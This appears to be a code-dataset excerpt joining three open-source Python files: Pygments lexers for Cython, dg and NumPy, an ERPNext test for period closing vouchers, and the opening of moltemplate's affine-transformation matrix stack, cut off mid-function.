'intb': [
(r'^( File )("[^"]+")(, line )(\d+)(, in )(.+)(\n)',
bygroups(Text, Name.Builtin, Text, Number, Text, Name, Text)),
(r'^( File )("[^"]+")(, line )(\d+)(\n)',
bygroups(Text, Name.Builtin, Text, Number, Text)),
(r'^( )(.+)(\n)',
bygroups(Text, using(Python3Lexer), Text)),
(r'^([ \t]*)(\.\.\.)(\n)',
bygroups(Text, Comment, Text)), # for doctests...
(r'^([^:]+)(: )(.+)(\n)',
bygroups(Generic.Error, Text, Name, Text), '#pop'),
(r'^([a-zA-Z_]\w*)(:?\n)',
bygroups(Generic.Error, Text), '#pop')
],
}
class CythonLexer(RegexLexer):
"""
For Pyrex and `Cython <http://cython.org>`_ source code.
.. versionadded:: 1.1
"""
name = 'Cython'
aliases = ['cython', 'pyx', 'pyrex']
filenames = ['*.pyx', '*.pxd', '*.pxi']
mimetypes = ['text/x-cython', 'application/x-cython']
tokens = {
'root': [
(r'\n', Text),
(r'^(\s*)("""(?:.|\n)*?""")', bygroups(Text, String.Doc)),
(r"^(\s*)('''(?:.|\n)*?''')", bygroups(Text, String.Doc)),
(r'[^\S\n]+', Text),
(r'#.*$', Comment),
(r'[]{}:(),;[]', Punctuation),
(r'\\\n', Text),
(r'\\', Text),
(r'(in|is|and|or|not)\b', Operator.Word),
(r'(<)([a-zA-Z0-9.?]+)(>)',
bygroups(Punctuation, Keyword.Type, Punctuation)),
(r'!=|==|<<|>>|[-~+/*%=<>&^|.?]', Operator),
(r'(from)(\d+)(<=)(\s+)(<)(\d+)(:)',
bygroups(Keyword, Number.Integer, Operator, Name, Operator,
Name, Punctuation)),
include('keywords'),
(r'(def|property)(\s+)', bygroups(Keyword, Text), 'funcname'),
(r'(cp?def)(\s+)', bygroups(Keyword, Text), 'cdef'),
(r'(class|struct)(\s+)', bygroups(Keyword, Text), 'classname'),
(r'(from)(\s+)', bygroups(Keyword, Text), 'fromimport'),
(r'(c?import)(\s+)', bygroups(Keyword, Text), 'import'),
include('builtins'),
include('backtick'),
('(?:[rR]|[uU][rR]|[rR][uU])"""', String, 'tdqs'),
("(?:[rR]|[uU][rR]|[rR][uU])'''", String, 'tsqs'),
('(?:[rR]|[uU][rR]|[rR][uU])"', String, 'dqs'),
("(?:[rR]|[uU][rR]|[rR][uU])'", String, 'sqs'),
('[uU]?"""', String, combined('stringescape', 'tdqs')),
("[uU]?'''", String, combined('stringescape', 'tsqs')),
('[uU]?"', String, combined('stringescape', 'dqs')),
("[uU]?'", String, combined('stringescape', 'sqs')),
include('name'),
include('numbers'),
],
'keywords': [
(words((
'assert', 'break', 'by', 'continue', 'ctypedef', 'del', 'elif',
'else', 'except', 'except?', 'exec', 'finally', 'for', 'gil',
'global', 'if', 'include', 'lambda', 'nogil', 'pass', 'print',
'raise', 'return', 'try', 'while', 'yield', 'as', 'with'), suffix=r'\b'),
Keyword),
(r'(DEF|IF|ELIF|ELSE)\b', Comment.Preproc),
],
'builtins': [
(words((
'__import__', 'abs', 'all', 'any', 'apply', 'basestring', 'bin',
'bool', 'buffer', 'bytearray', 'bytes', 'callable', 'chr',
'classmethod', 'cmp', 'coerce', 'compile', 'complex', 'delattr',
'dict', 'dir', 'divmod', 'enumerate', 'eval', 'execfile', 'exit',
'file', 'filter', 'float', 'frozenset', 'getattr', 'globals',
'hasattr', 'hash', 'hex', 'id', 'input', 'int', 'intern', 'isinstance',
'issubclass', 'iter', 'len', 'list', 'locals', 'long', 'map', 'max',
'min', 'next', 'object', 'oct', 'open', 'ord', 'pow', 'property',
'range', 'raw_input', 'reduce', 'reload', 'repr', 'reversed',
'round', 'set', 'setattr', 'slice', 'sorted', 'staticmethod',
'str', 'sum', 'super', 'tuple', 'type', 'unichr', 'unicode',
'vars', 'xrange', 'zip'), prefix=r'(?<!\.)', suffix=r'\b'),
Name.Builtin),
(r'(?<!\.)(self|None|Ellipsis|NotImplemented|False|True|NULL'
r')\b', Name.Builtin.Pseudo),
(words((
'ArithmeticError', 'AssertionError', 'AttributeError',
'BaseException', 'DeprecationWarning', 'EOFError', 'EnvironmentError',
'Exception', 'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError',
'ImportError', 'ImportWarning', 'IndentationError', 'IndexError', 'KeyError',
'KeyboardInterrupt', 'LookupError', 'MemoryError', 'NameError',
'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError',
'OverflowWarning', 'PendingDeprecationWarning', 'ReferenceError',
'RuntimeError', 'RuntimeWarning', 'StandardError', 'StopIteration',
'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError',
'TypeError', 'UnboundLocalError', 'UnicodeDecodeError',
'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError',
'UnicodeWarning', 'UserWarning', 'ValueError', 'Warning',
'ZeroDivisionError'), prefix=r'(?<!\.)', suffix=r'\b'),
Name.Exception),
],
'numbers': [
(r'(\d+\.?\d*|\d*\.\d+)([eE][+-]?[0-9]+)?', Number.Float),
(r'0\d+', Number.Oct),
(r'0[xX][a-fA-F0-9]+', Number.Hex),
(r'\d+L', Number.Integer.Long),
(r'\d+', Number.Integer)
],
'backtick': [
('`.*?`', String.Backtick),
],
'name': [
(r'@\w+', Name.Decorator),
('[a-zA-Z_]\w*', Name),
],
'funcname': [
('[a-zA-Z_]\w*', Name.Function, '#pop')
],
'cdef': [
(r'(public|readonly|extern|api|inline)\b', Keyword.Reserved),
(r'(struct|enum|union|class)\b', Keyword),
(r'([a-zA-Z_]\w*)(\s*)(?=[(:#=]|$)',
bygroups(Name.Function, Text), '#pop'),
(r'([a-zA-Z_]\w*)(\s*)(,)',
bygroups(Name.Function, Text, Punctuation)),
(r'from\b', Keyword, '#pop'),
(r'as\b', Keyword),
(r':', Punctuation, '#pop'),
(r'(?=["\'])', Text, '#pop'),
(r'[a-zA-Z_]\w*', Keyword.Type),
(r'.', Text),
],
'classname': [
('[a-zA-Z_]\w*', Name.Class, '#pop')
],
'import': [
(r'(\s+)(as)(\s+)', bygroups(Text, Keyword, Text)),
(r'[a-zA-Z_][\w.]*', Name.Namespace),
(r'(\s*)(,)(\s*)', bygroups(Text, Operator, Text)),
default('#pop') # all else: go back
],
'fromimport': [
(r'(\s+)(c?import)\b', bygroups(Text, Keyword), '#pop'),
(r'[a-zA-Z_.][\w.]*', Name.Namespace),
# ``cdef foo from "header"``, or ``for foo from 0 < i < 10``
default('#pop'),
],
'stringescape': [
(r'\\([\\abfnrtv"\']|\n|N\{.*?\}|u[a-fA-F0-9]{4}|'
r'U[a-fA-F0-9]{8}|x[a-fA-F0-9]{2}|[0-7]{1,3})', String.Escape)
],
'strings': [
(r'%(\([a-zA-Z0-9]+\))?[-#0 +]*([0-9]+|[*])?(\.([0-9]+|[*]))?'
'[hlL]?[diouxXeEfFgGcrs%]', String.Interpol),
(r'[^\\\'"%\n]+', String),
# quotes, percents and backslashes must be parsed one at a time
(r'[\'"\\]', String),
# unhandled string formatting sign
(r'%', String)
# newlines are an error (use "nl" state)
],
'nl': [
(r'\n', String)
],
'dqs': [
(r'"', String, '#pop'),
(r'\\\\|\\"|\\\n', String.Escape), # included here again for raw strings
include('strings')
],
'sqs': [
(r"'", String, '#pop'),
(r"\\\\|\\'|\\\n", String.Escape), # included here again for raw strings
include('strings')
],
'tdqs': [
(r'"""', String, '#pop'),
include('strings'),
include('nl')
],
'tsqs': [
(r"'''", String, '#pop'),
include('strings'),
include('nl')
],
}
class DgLexer(RegexLexer):
"""
Lexer for `dg <http://pyos.github.com/dg>`_,
a functional and object-oriented programming language
running on the CPython 3 VM.
.. versionadded:: 1.6
"""
name = 'dg'
aliases = ['dg']
filenames = ['*.dg']
mimetypes = ['text/x-dg']
tokens = {
'root': [
(r'\s+', Text),
(r'#.*?$', Comment.Single),
(r'(?i)0b[01]+', Number.Bin),
(r'(?i)0o[0-7]+', Number.Oct),
(r'(?i)0x[0-9a-f]+', Number.Hex),
(r'(?i)[+-]?[0-9]+\.[0-9]+(e[+-]?[0-9]+)?j?', Number.Float),
(r'(?i)[+-]?[0-9]+e[+-]?\d+j?', Number.Float),
(r'(?i)[+-]?[0-9]+j?', Number.Integer),
(r"(?i)(br|r?b?)'''", String, combined('stringescape', 'tsqs', 'string')),
(r'(?i)(br|r?b?)"""', String, combined('stringescape', 'tdqs', 'string')),
(r"(?i)(br|r?b?)'", String, combined('stringescape', 'sqs', 'string')),
(r'(?i)(br|r?b?)"', String, combined('stringescape', 'dqs', 'string')),
(r"`\w+'*`", Operator),
(r'\b(and|in|is|or|where)\b', Operator.Word),
(r'[!$%&*+\-./:<-@\\^|~;,]+', Operator),
(words((
'bool', 'bytearray', 'bytes', 'classmethod', 'complex', 'dict', 'dict\'',
'float', 'frozenset', 'int', 'list', 'list\'', 'memoryview', 'object',
'property', 'range', 'set', 'set\'', 'slice', 'staticmethod', 'str', 'super',
'tuple', 'tuple\'', 'type'), prefix=r'(?<!\.)', suffix=r'(?![\'\w])'),
Name.Builtin),
(words((
'__import__', 'abs', 'all', 'any', 'bin', 'bind', 'chr', 'cmp', 'compile',
'complex', 'delattr', 'dir', 'divmod', 'drop', 'dropwhile', 'enumerate',
'eval', 'exhaust', 'filter', 'flip', 'foldl1?', 'format', 'fst', 'getattr',
'globals', 'hasattr', 'hash', 'head', 'hex', 'id', 'init', 'input',
'isinstance', 'issubclass', 'iter', 'iterate', 'last', 'len', 'locals',
'map', 'max', 'min', 'next', 'oct', 'open', 'ord', 'pow', 'print', 'repr',
'reversed', 'round', 'setattr', 'scanl1?', 'snd', 'sorted', 'sum', 'tail',
'take', 'takewhile', 'vars', 'zip'), prefix=r'(?<!\.)', suffix=r'(?![\'\w])'),
Name.Builtin),
(r"(?<!\.)(self|Ellipsis|NotImplemented|None|True|False)(?!['\w])",
Name.Builtin.Pseudo),
(r"(?<!\.)[A-Z]\w*(Error|Exception|Warning)'*(?!['\w])",
Name.Exception),
(r"(?<!\.)(Exception|GeneratorExit|KeyboardInterrupt|StopIteration|"
r"SystemExit)(?!['\w])", Name.Exception),
(r"(?<![\w.])(except|finally|for|if|import|not|otherwise|raise|"
r"subclass|while|with|yield)(?!['\w])", Keyword.Reserved),
(r"[A-Z_]+'*(?!['\w])", Name),
(r"[A-Z]\w+'*(?!['\w])", Keyword.Type),
(r"\w+'*", Name),
(r'[()]', Punctuation),
(r'.', Error),
],
'stringescape': [
(r'\\([\\abfnrtv"\']|\n|N\{.*?\}|u[a-fA-F0-9]{4}|'
r'U[a-fA-F0-9]{8}|x[a-fA-F0-9]{2}|[0-7]{1,3})', String.Escape)
],
'string': [
(r'%(\(\w+\))?[-#0 +]*([0-9]+|[*])?(\.([0-9]+|[*]))?'
'[hlL]?[diouxXeEfFgGcrs%]', String.Interpol),
(r'[^\\\'"%\n]+', String),
# quotes, percents and backslashes must be parsed one at a time
(r'[\'"\\]', String),
# unhandled string formatting sign
(r'%', String),
(r'\n', String)
],
'dqs': [
(r'"', String, '#pop')
],
'sqs': [
(r"'", String, '#pop')
],
'tdqs': [
(r'"""', String, '#pop')
],
'tsqs': [
(r"'''", String, '#pop')
],
}
class NumPyLexer(PythonLexer):
"""
A Python lexer recognizing Numerical Python builtins.
.. versionadded:: 0.10
"""
name = 'NumPy'
aliases = ['numpy']
# override the mimetypes to not inherit them from python
mimetypes = []
filenames = []
EXTRA_KEYWORDS = set((
'abs', 'absolute', 'accumulate', 'add', 'alen', 'all', 'allclose',
'alltrue', 'alterdot', 'amax', 'amin', 'angle', 'any', 'append',
'apply_along_axis', 'apply_over_axes', 'arange', 'arccos', 'arccosh',
'arcsin', 'arcsinh', 'arctan', 'arctan2', 'arctanh', 'argmax', 'argmin',
'argsort', 'argwhere', 'around', 'array', 'array2string', 'array_equal',
'array_equiv', 'array_repr', 'array_split', 'array_str', 'arrayrange',
'asanyarray', 'asarray', 'asarray_chkfinite', 'ascontiguousarray',
'asfarray', 'asfortranarray', 'asmatrix', 'asscalar', 'astype',
'atleast_1d', 'atleast_2d', 'atleast_3d', 'average', 'bartlett',
'base_repr', 'beta', 'binary_repr', 'bincount', 'binomial',
'bitwise_and', 'bitwise_not', 'bitwise_or', 'bitwise_xor', 'blackman',
'bmat', 'broadcast', 'byte_bounds', 'bytes', 'byteswap', 'c_',
'can_cast', 'ceil', 'choose', 'clip', 'column_stack', 'common_type',
'compare_chararrays', 'compress', 'concatenate', 'conj', 'conjugate',
'convolve', 'copy', 'corrcoef', 'correlate', 'cos', 'cosh', 'cov',
'cross', 'cumprod', 'cumproduct', 'cumsum', 'delete', 'deprecate',
'diag', 'diagflat', 'diagonal', 'diff', 'digitize', 'disp', 'divide',
'dot', 'dsplit', 'dstack', 'dtype', 'dump', 'dumps', 'ediff1d', 'empty',
'empty_like', 'equal', 'exp', 'expand_dims', 'expm1', 'extract', 'eye',
'fabs', 'fastCopyAndTranspose', 'fft', 'fftfreq', 'fftshift', 'fill',
'finfo', 'fix', 'flat', 'flatnonzero', 'flatten', 'fliplr', 'flipud',
'floor', 'floor_divide', 'fmod', 'frexp', 'fromarrays', 'frombuffer',
'fromfile', 'fromfunction', 'fromiter', 'frompyfunc', 'fromstring',
'generic', 'get_array_wrap', 'get_include', 'get_numarray_include',
'get_numpy_include', 'get_printoptions', 'getbuffer', 'getbufsize',
'geterr', 'geterrcall', 'geterrobj', 'getfield', 'gradient', 'greater',
'greater_equal', 'gumbel', 'hamming', 'hanning', 'histogram',
'histogram2d', 'histogramdd', 'hsplit', 'hstack', 'hypot', 'i0',
'identity', 'ifft', 'imag', 'index_exp', 'indices', 'inf', 'info',
'inner', 'insert', 'int_asbuffer', 'interp', 'intersect1d',
'intersect1d_nu', 'inv', 'invert', 'iscomplex', 'iscomplexobj',
'isfinite', 'isfortran', 'isinf', 'isnan', 'isneginf', 'isposinf',
'isreal', 'isrealobj', 'isscalar', 'issctype', 'issubclass_',
'issubdtype', 'issubsctype', 'item', 'itemset', 'iterable', 'ix_',
'kaiser', 'kron', 'ldexp', 'left_shift', 'less', 'less_equal', 'lexsort',
'linspace', 'load', 'loads', 'loadtxt', 'log', 'log10', 'log1p', 'log2',
'logical_and', 'logical_not', 'logical_or', 'logical_xor', 'logspace',
'lstsq', 'mat', 'matrix', 'max', 'maximum', 'maximum_sctype',
'may_share_memory', 'mean', 'median', 'meshgrid', 'mgrid', 'min',
'minimum', 'mintypecode', 'mod', 'modf', 'msort', 'multiply', 'nan',
'nan_to_num', 'nanargmax', 'nanargmin', 'nanmax', 'nanmin', 'nansum',
'ndenumerate', 'ndim', 'ndindex', 'negative', 'newaxis', 'newbuffer',
'newbyteorder', 'nonzero', 'not_equal', 'obj2sctype', 'ogrid', 'ones',
'ones_like', 'outer', 'permutation', 'piecewise', 'pinv', 'pkgload',
'place', 'poisson', 'poly', 'poly1d', 'polyadd', 'polyder', 'polydiv',
'polyfit', 'polyint', 'polymul', 'polysub', 'polyval', 'power', 'prod',
'product', 'ptp', 'put', 'putmask', 'r_', 'randint', 'random_integers',
'random_sample', 'ranf', 'rank', 'ravel', 'real', 'real_if_close',
'recarray', 'reciprocal', 'reduce', 'remainder', 'repeat', 'require',
'reshape', 'resize', 'restoredot', 'right_shift', 'rint', 'roll',
'rollaxis', 'roots', 'rot90', 'round', 'round_', 'row_stack', 's_',
'sample', 'savetxt', 'sctype2char', 'searchsorted', 'seed', 'select',
'set_numeric_ops', 'set_printoptions', 'set_string_function',
'setbufsize', 'setdiff1d', 'seterr', 'seterrcall', 'seterrobj',
'setfield', 'setflags', 'setmember1d', 'setxor1d', 'shape',
'show_config', 'shuffle', 'sign', 'signbit', 'sin', 'sinc', 'sinh',
'size', 'slice', 'solve', 'sometrue', 'sort', 'sort_complex', 'source',
'split', 'sqrt', 'square', 'squeeze', 'standard_normal', 'std',
'subtract', 'sum', 'svd', 'swapaxes', 'take', 'tan', 'tanh', 'tensordot',
'test', 'tile', 'tofile', 'tolist', 'tostring', 'trace', 'transpose',
'trapz', 'tri', 'tril', 'trim_zeros', 'triu', 'true_divide', 'typeDict',
'typename', 'uniform', 'union1d', 'unique', 'unique1d', 'unravel_index',
'unwrap', 'vander', 'var', 'vdot', 'vectorize', 'view', 'vonmises',
'vsplit', 'vstack', 'weibull', 'where', 'who', 'zeros', 'zeros_like'
))
def get_tokens_unprocessed(self, text):
for index, token, value in \
PythonLexer.get_tokens_unprocessed(self, text):
if token is Name and value in self.EXTRA_KEYWORDS:
yield index, Keyword.Pseudo, value
else:
yield index, token, value
def analyse_text(text):
return (shebang_matches(text, r'pythonw?(2(\.\d)?)?') or
'import ' in text[:1000]) \
and ('import numpy' in text or 'from numpy import' in text)
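# Usage sketch (editor's illustration; highlight and TerminalFormatter are
# the usual Pygments entry points, defined outside this module):
#
#   from pygments import highlight
#   from pygments.formatters import TerminalFormatter
#   code = 'import numpy\nx = numpy.arange(3)'
#   print(highlight(code, NumPyLexer(), TerminalFormatter()))
#
# Names listed in EXTRA_KEYWORDS (here "arange") are re-tagged by
# get_tokens_unprocessed() as Keyword.Pseudo instead of plain Name tokens.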
| mit |
mahabuber/erpnext | erpnext/accounts/doctype/period_closing_voucher/test_period_closing_voucher.py | 13 | 3362 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import unittest
import frappe
from frappe.utils import flt, today
from erpnext.accounts.utils import get_fiscal_year
from erpnext.accounts.doctype.journal_entry.test_journal_entry import make_journal_entry
class TestPeriodClosingVoucher(unittest.TestCase):
def test_closing_entry(self):
year_start_date = get_fiscal_year(today())[1]
make_journal_entry("_Test Bank - _TC", "Sales - _TC", 400,
"_Test Cost Center - _TC", submit=True)
make_journal_entry("_Test Account Cost for Goods Sold - _TC",
"_Test Bank - _TC", 600, "_Test Cost Center - _TC", submit=True)
random_expense_account = frappe.db.sql("""
select t1.account,
sum(t1.debit) - sum(t1.credit) as balance,
sum(t1.debit_in_account_currency) - sum(t1.credit_in_account_currency) \
as balance_in_account_currency
from `tabGL Entry` t1, `tabAccount` t2
where t1.account = t2.name and t2.root_type = 'Expense'
and t2.docstatus < 2 and t2.company = '_Test Company'
and t1.posting_date between %s and %s
group by t1.account
having sum(t1.debit) > sum(t1.credit)
limit 1""", (year_start_date, today()), as_dict=True)
profit_or_loss = frappe.db.sql("""select sum(t1.debit) - sum(t1.credit) as balance
from `tabGL Entry` t1, `tabAccount` t2
where t1.account = t2.name and t2.report_type = 'Profit and Loss'
and t2.docstatus < 2 and t2.company = '_Test Company'
and t1.posting_date between %s and %s""", (year_start_date, today()))
profit_or_loss = flt(profit_or_loss[0][0]) if profit_or_loss else 0
pcv = self.make_period_closing_voucher()
# Check value for closing account
gle_amount_for_closing_account = frappe.db.sql("""select debit - credit
from `tabGL Entry` where voucher_type='Period Closing Voucher' and voucher_no=%s
and account = '_Test Account Reserves and Surplus - _TC'""", pcv.name)
gle_amount_for_closing_account = flt(gle_amount_for_closing_account[0][0]) \
if gle_amount_for_closing_account else 0
self.assertEqual(gle_amount_for_closing_account, profit_or_loss)
if random_expense_account:
			# Check posted value for the above random_expense_account
gle_for_random_expense_account = frappe.db.sql("""
select debit - credit as amount,
debit_in_account_currency - credit_in_account_currency
as amount_in_account_currency
from `tabGL Entry`
where voucher_type='Period Closing Voucher' and voucher_no=%s and account =%s""",
(pcv.name, random_expense_account[0].account), as_dict=True)
self.assertEqual(gle_for_random_expense_account[0].amount, -1*random_expense_account[0].balance)
self.assertEqual(gle_for_random_expense_account[0].amount_in_account_currency,
-1*random_expense_account[0].balance_in_account_currency)
def make_period_closing_voucher(self):
pcv = frappe.get_doc({
"doctype": "Period Closing Voucher",
"closing_account_head": "_Test Account Reserves and Surplus - _TC",
"company": "_Test Company",
"fiscal_year": get_fiscal_year(today())[0],
"posting_date": today(),
"remarks": "test"
})
pcv.insert()
pcv.submit()
return pcv
test_dependencies = ["Customer", "Cost Center"]
test_records = frappe.get_test_records("Period Closing Voucher")
| agpl-3.0 |
ComputationalPhysics/atomify-lammps | libs/lammps/tools/moltemplate/moltemplate/ttree_matrix_stack.py | 8 | 36977 | # Author: Andrew Jewett (jewett.aij@gmail.com)
# http://www.chem.ucsb.edu/~sheagroup
# License: 3-clause BSD License (See LICENSE.TXT)
# Copyright (c) 2012, Regents of the University of California
# All rights reserved.
import random, math
from collections import deque
from array import array
try:
from .ttree_lex import InputError, ErrorLeader, OSrcLoc
except (SystemError, ValueError):
# not installed as a package
from ttree_lex import InputError, ErrorLeader, OSrcLoc
def MultMat(dest, A, B):
""" Multiply two matrices together. Store result in "dest".
"""
I = len(A)
J = len(B[0])
K = len(B) # or len(A[0])
for i in range(0, I):
for j in range(0, J):
dest[i][j] = 0.0
for k in range(0, K):
dest[i][j] += A[i][k] * B[k][j]
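# Quick check (editor's illustration):
#   A = [[1.0, 2.0], [3.0, 4.0]]
#   B = [[5.0, 6.0], [7.0, 8.0]]
#   C = [[0.0, 0.0], [0.0, 0.0]]
#   MultMat(C, A, B)   # C is now [[19.0, 22.0], [43.0, 50.0]]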
def MatToStr(M):
strs = []
for i in range(0, len(M)):
for j in range(0, len(M[i])):
strs.append(str(M[i][j]) + ' ')
strs.append('\n')
return(''.join(strs))
def LinTransform(dest, M, x):
""" Multiply matrix M by 1-dimensioal array (vector) "x" (from the right).
Store result in 1-dimensional array "dest".
    In this function, we treat "x" and "dest" as column vectors.
(Not row vectors.)
"""
I = len(M)
J = len(x)
for i in range(0, I):
dest[i] = 0.0
for j in range(0, J):
dest[i] += M[i][j] * x[j]
def AffineTransform(dest, M, x):
""" This function performs an affine transformation on vector "x".
Multiply 3-dimensional vector "x" by first three columns of 3x4
matrix M. Add to this the final column of M. Store result in "dest":
dest[0] = M[0][0]*x[0] + M[0][1]*x[1] + M[0][2]*x[2] + M[0][3]
dest[1] = M[1][0]*x[0] + M[1][1]*x[1] + M[1][2]*x[2] + M[1][3]
dest[2] = M[2][0]*x[0] + M[2][1]*x[1] + M[2][2]*x[2] + M[2][3]
"""
D = len(M)
#assert(len(M[0]) == D+1)
for i in range(0, D):
dest[i] = 0.0
for j in range(0, D):
dest[i] += M[i][j] * x[j]
dest[i] += M[i][D] # (translation offset stored in final column)
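# Example (editor's illustration): a pure translation by (1, 2, 3) applied
# to the origin.
#   M = [[1.0, 0.0, 0.0, 1.0],
#        [0.0, 1.0, 0.0, 2.0],
#        [0.0, 0.0, 1.0, 3.0]]
#   p = [0.0, 0.0, 0.0]
#   AffineTransform(p, M, [0.0, 0.0, 0.0])   # p is now [1.0, 2.0, 3.0]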
def AffineCompose(dest, M2, M1):
"""
Multiplication for pairs of 3x4 matrices is technically undefined.
However what we want to do is compose two affine transformations: M1 and M2
3x4 matrices are used to define rotations/translations
x' = M[0][0]*x + M[0][1]*y + M[0][2]*z + M[0][3]
y' = M[1][0]*x + M[1][1]*y + M[1][2]*z + M[1][3]
z' = M[2][0]*x + M[2][1]*y + M[2][2]*z + M[2][3]
We want to create a new 3x4 matrix representing an affine transformation
(M2 M1), defined so that when (M2 M1) is applied to vector x, the result is
M2 (M1 x). In other words:
first, affine transformation M1 is applied to to x
then, affine transformation M2 is applied to (M1 x)
"""
D = len(M1)
#assert(len(M1[0]) == D+1)
#assert(len(M2[0]) == D+1)
for i in range(0, D):
dest[i][D] = 0.0
for j in range(0, D + 1):
dest[i][j] = 0.0
for k in range(0, D):
dest[i][j] += M2[i][k] * M1[k][j]
dest[i][D] += M2[i][D]
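# Composition check (editor's illustration): translating by (1,0,0) and then
# by (0,2,0) equals a single translation by (1,2,0).
#   T1 = [[1.0, 0.0, 0.0, 1.0], [0.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 0.0]]
#   T2 = [[1.0, 0.0, 0.0, 0.0], [0.0, 1.0, 0.0, 2.0], [0.0, 0.0, 1.0, 0.0]]
#   D = [[0.0]*4 for i in range(3)]
#   AffineCompose(D, T2, T1)   # last column of D is now [1.0, 2.0, 0.0]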
def CopyMat(dest, source):
for i in range(0, len(source)):
for j in range(0, len(source[i])):
dest[i][j] = source[i][j]
class AffineStack(object):
"""
This class defines a matrix stack used to define compositions of affine
transformations of 3 dimensional coordinates (rotation and translation).
Affine transformations are represented using 3x4 matrices.
(Coordinates of atoms are thought of as column vectors: [[x],[y],[z]],
although they are represented internally in the more ordinary way [x,y,z].
    To apply an affine transformation to a vector, multiply the vector
by the matrix, from the left-hand side, as explained in the comments for:
AffineTransform(dest, M, x)
Note: The last column of the 3x4 matrix stores a translational offset.
This bears similarity with the original OpenGL matrix stack
http://content.gpwiki.org/index.php/OpenGL:Tutorials:Theory
(OpenGL uses 4x4 matrices. We don't need the final row of these matrices,
because in OpenGL, these rows are used for perspective transformations.)
http://en.wikipedia.org/wiki/Homogeneous_coordinates#Use_in_computer_graphics
"""
def __init__(self):
self.stack = None
self.M = None
self._tmp = None
self.Clear()
def Clear(self):
self.stack = deque([])
self.M = [[1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0]] # (identity, initially)
self._tmp = [[1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0]]
def PushRight(self, M):
# Push a copy of matrix self.M onto the stack
# We make no distinction between "right" and "left" here.
# All transformations are pushed onto the stack in the same way.
# (The "right" and "left" refer to whether the matrix is multiplied
# on the right of left hand side. Because not all matrices need be
# invertible, we require that matrices be popped from the stack
# in the reverse order they were pushed. This prevents the ability
# to push and pop matrices to either end of the stack in an arbitrary
# order (like append(), appendleft(), pop(), popleft()).)
self.stack.append([[self.M[i][j] for j in range(0, len(self.M[i]))]
for i in range(0, len(self.M))])
# The "Right" and "Left" refer to whether the new matrix is multiplied
        # on the right or left side of the cumulative matrix product.
# Afterwards, self._tmp = self.M * M
AffineCompose(self._tmp, self.M, M)
        # sys.stderr.write('DEBUG: PushRight()\n' +
# MatToStr(self._tmp) + '\n = \n' +
# MatToStr(M) + '\n * \n' +
# MatToStr(self.M) + '\n')
CopyMat(self.M, self._tmp) # Copy self._tmp into self.M
def PushLeft(self, M):
# Push a copy of matrix self.M onto the stack
# We make no distinction between right and left here.
# All transformations are pushed onto the stack in the same way.
# (The "right" and "left" refer to whether the matrix is multiplied
# on the right of left hand side. Because not all matrices need be
# invertible, we require that matrices be popped from the stack
# in the reverse order they were pushed. This prevents the ability
# to push and pop matrices to either end of the stack in an arbitrary
# order (like append(), appendleft(), pop(), popleft()).)
self.stack.append([[self.M[i][j] for j in range(0, len(self.M[i]))]
for i in range(0, len(self.M))])
# The "Right" and "Left" refer to whether the new matrix is multiplied
        # on the right or left side of the cumulative matrix product.
# Afterwards, self._tmp = M * self.M
AffineCompose(self._tmp, M, self.M)
# sys.stderr.write('DEBUG: PushLeft()\n' +
# MatToStr(self._tmp) + '\n = \n' +
# MatToStr(M) + '\n * \n' +
# MatToStr(self.M) + '\n')
        CopyMat(self.M, self._tmp) # Copy self._tmp into self.M
def Pop(self):
CopyMat(self.M, self.stack.pop())
# (No need to return a matrix,"self.M",after popping.
# The caller can directly access self.M later.)
# return self.M
def PopRight(self):
self.Pop()
def PopLeft(self):
self.Pop()
def PushCommandsRight(self,
text, # text containing affine transformation commands
# The next two arguments are optional:
src_loc=OSrcLoc(), # for debugging
xcm=None): # position of center of object
"""Generate affine transformation matrices from simple text commands
(such as \"rotcm(90,0,0,1)\" and \"move(0,5.0,0)".
Chains of "rotcm", "movecm", "rot", and "move" commands
can also be strung together:
\"rotcm(90,0,0,1).move(0,5.0,0)\"
Commands ending in \"cm\" are carried out relative to center-of-mass
(average position) of the object, and consequently require
an additional argument (\"xcm\").
"""
self.PushRight(AffineStack.CommandsToMatrix(text, src_loc, xcm))
def PushCommandsLeft(self,
text, # text containing affine transformation commands
# The next two arguments are optional:
src_loc=OSrcLoc(), # for debugging
xcm=None): # position of center of object
self.PushLeft(AffineStack.CommandsToMatrix(text, src_loc, xcm))
def __len__(self):
return 1 + len(self.stack)
@staticmethod
def CommandsToMatrix(text, # text containing affine transformation commands
src_loc=OSrcLoc(), # for debugging
xcm=None): # position of center of object
Mdest = [[1.0, 0.0, 0.0, 0.0], [
0.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 0.0]]
M = [[1.0, 0.0, 0.0, 0.0], [0.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 0.0]]
Mtmp = [[1.0, 0.0, 0.0, 0.0], [
0.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 0.0]]
transform_commands = text.split(').')
for transform_str in transform_commands:
if transform_str.find('move(') == 0:
i_paren_close = transform_str.find(')')
if i_paren_close == -1:
i_paren_close = len(transform_str)
args = transform_str[5:i_paren_close].split(',')
if (len(args) != 3):
raise InputError('Error near ' + ErrorLeader(src_loc.infile, src_loc.lineno) + ':\n'
' Invalid command: \"' + transform_str + '\"\n'
' This command requires 3 numerical arguments.')
M = [[1.0, 0.0, 0.0, float(args[0])],
[0.0, 1.0, 0.0, float(args[1])],
[0.0, 0.0, 1.0, float(args[2])]]
AffineCompose(Mtmp, M, Mdest)
CopyMat(Mdest, Mtmp)
# if transform_str.find('movecm(') == 0:
# # assert(xcm != None)
# i_paren_close = transform_str.find(')')
# if i_paren_close == -1:
# i_paren_close = len(transform_str)
# args = transform_str[8:i_paren_close].split(',')
# if (len(args) != 3):
# raise InputError('Error near '+ErrorLeader(src_loc.infile, src_loc.lineno)+':\n'
# ' Invalid command: \"'+transform_str+'\"\n'
# ' This command requires 3 numerical arguments.')
# M = [[1.0, 0.0, 0.0, float(args[0])-(xcm[0])],
# [0.0, 1.0, 0.0, float(args[1])-(xcm[1])],
# [0.0, 0.0, 1.0, float(args[2])-(xcm[2])]]
